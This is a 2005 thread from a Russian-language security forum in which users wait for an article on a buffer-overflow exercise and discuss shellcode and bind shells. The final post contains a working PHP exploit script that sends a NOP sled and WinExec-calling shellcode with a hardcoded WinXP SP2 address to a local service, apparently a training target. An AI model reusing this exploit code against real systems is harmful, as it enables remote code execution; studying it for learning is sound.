ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.05.2005, 15:22
|
|
Banned
Регистрация: 14.03.2005
Сообщений: 21
Провел на форуме:
99047
Репутация:
-2
|
|
БЫСТРЕЙ Kez СТАТЬИ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! МОЖНО СТОЛЬКО ЖДАТЬ?!?!?!?!Я УЖЕ УСТАЛ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!ПРОШУ СТАТЬЮ!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!!!!А РАЗВЕ ВИДЕО-ДЕМОНСТРАЦИЯ НЕ МЕНЬШЕ БЫ ВРЕМЕНИ ВЗЯЛА????????????
|
|
|
08.05.2005, 20:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
я же сказал, что cha0s медлит я уже написал
|
|
|
|
08.05.2005, 21:52
|
|
Banned
Регистрация: 14.03.2005
Сообщений: 21
Провел на форуме:
99047
Репутация:
-2
|
|
Ну а когда будет примерно всё готово.То Егор кинул (вот это я НИКОГДА не говорил, я сказал что он был занят - прим. кез) ,то этот медлит.
Последний раз редактировалось KEZ; 10.05.2005 в 16:04..
|
|
|
|
09.05.2005, 13:11
|
|
Новичок
Регистрация: 18.04.2005
Сообщений: 5
Провел на форуме:
9154
Репутация:
0
|
|
а мне нравится что Kez медлит я успел допереть сам (не до шелла пока конечно)
.... много чего еще понял по пути к победе... 
Последний раз редактировалось fra_f; 09.05.2005 в 15:44..
|
|
|
|
11.05.2005, 01:44
|
|
Новичок
Регистрация: 24.04.2005
Сообщений: 16
Провел на форуме:
33678
Репутация:
0
|
|
Слушайте, кто-нибудь уже шелл заклепал??
А то я уже...
А вот кто бы мне помог его на порт повесить?? Ниче не получается.
Если кто повесил, отпишите пожалуйста. Мне интересно, в чем моя ошибка.
|
|
|
|
11.05.2005, 12:59
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
все там получается. хотя не скажу что это очень просто...
|
|
|
|
17.05.2005, 23:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
Репутация:
|
|
Вашу... Я же немогу выложить то что я написал, НЕ ПОКАЗАВ как сделать bind
|
|
|
|
17.05.2005, 23:32
|
|
Новичок
Регистрация: 24.04.2005
Сообщений: 16
Провел на форуме:
33678
Репутация:
0
|
|
ну так чё там с переполнением буфера и внедрение шел кода?
Да за это время можно было 500 раз переполнить и шелл написать.
|
|
|
|
24.05.2005, 00:39
|
|
Новичок
Регистрация: 24.04.2005
Сообщений: 16
Провел на форуме:
33678
Репутация:
0
|
|
Что-то затихли все...
Что статья уже вышла??
|
|
|
|
24.05.2005, 15:45
|
|
Новичок
Регистрация: 13.12.2004
Сообщений: 19
Провел на форуме:
31812
Репутация:
11
|
|
exploit
<?
# fl - Вызов функции fl()
# cmd - запуск командного интерпретатора - cmd.exe
$overflow = "cmd";
# WinExec адрес - kernel32.dll
# Чтобы достать адрес WinExec, качаем прогу:
# http://nst.void.ru/download/arwin.exe
# Usage:
# arwin.exe kernel32.dll WinExec
# Result: WinExec is located at 0x7c86114d in kernel32.dll
# # # # # # #
# WinXP -
# WinXP sp1 -
# WinXP sp2 - \x4D\x11\x86\x7C (7C86114D)
# # # # # # #
# Win2k sp1 -
# Win2k sp2 -
# Win2k sp3 -
# Win2k sp4 -
# # # # # # #
# Win98 -
# Win98 SE -
# # # # # # #
$winexec_addr = "\x4D\x11\x86\x7C";
# exploit
$srv = fsockopen("127.0.0.1", 8877);
if($overflow=="fl") $eip = "\xA8\x10\x40\x00";
if($overflow=="cmd") $eip = "\xC4\xFE\x12\x00";
for($i=0; $i<77; $i++) $nop .="\x90";
$nst = "waaaaa".
# cmd
"\x33\xC0\x50\x68\x43\x4D\x44\x20\x54\xB8".
$winexec_addr.
"\xFF\xD0\xEB\xFE".
$nop.
"AAAA". # EBP
$eip; # EIP
fwrite($srv, $nst);
print "Shellcode length:".strlen($nst);
?> |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
